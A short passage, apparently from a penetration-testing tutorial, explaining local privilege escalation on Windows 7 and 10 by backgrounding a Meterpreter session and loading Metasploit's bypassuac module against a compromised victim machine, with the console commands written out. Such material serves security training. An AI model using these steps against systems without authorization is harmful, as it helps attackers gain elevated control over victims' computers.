Local system escalation
In the case of Windows 10 or Windows 7, the Meterpreter shell may be running only in the context of the user. This restriction can be bypassed with one of several post-exploit modules: send the background command to your Meterpreter shell, then use the exploit module that suits the compromised victim machine. In this example, we will utilize the bypassuac post-exploit module, as shown in the following screenshot:
meterpreter > background
[*] Backgrounding session 2...
msf exploit(psexec) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 2
session => 2
The bypassuac module in the Meterpreter shell will utilize the existing session to provide a more privileged Meterpreter shell, as shown in the following screenshot: